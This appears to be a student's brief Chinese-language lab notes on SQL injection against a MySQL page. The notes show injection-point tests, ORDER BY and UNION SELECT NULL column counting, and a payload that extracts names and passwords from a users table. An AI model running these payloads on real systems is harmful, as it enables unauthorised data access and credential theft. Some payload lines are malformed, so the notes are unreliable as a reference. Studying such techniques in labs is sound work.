任务一、
判断注入点 :单引号、and 1=1、and 1=2。
1、' and order by 5%23 猜解字段数
'2、 and order by 6%23
(mysql注释也可以用--+,+代表空格,这里%23代表 # 号)
mysql注释符有三种:1、#...2、"-- ..."
3、/*...*/
另一种方法是
1、union select null from users%23
2、 union select null,null from users%23
3、union select null,null,null from users%23
4、union select null,null,null,null from users%23
5、union select null,null,null,null,null from users%23 返回正确,说明该表拥有5个字段
之后便查询用户名和密码
'union select null,name,passwd,null,null from users
这里字段名。。。不知道怎么猜解, 直接猜的,试了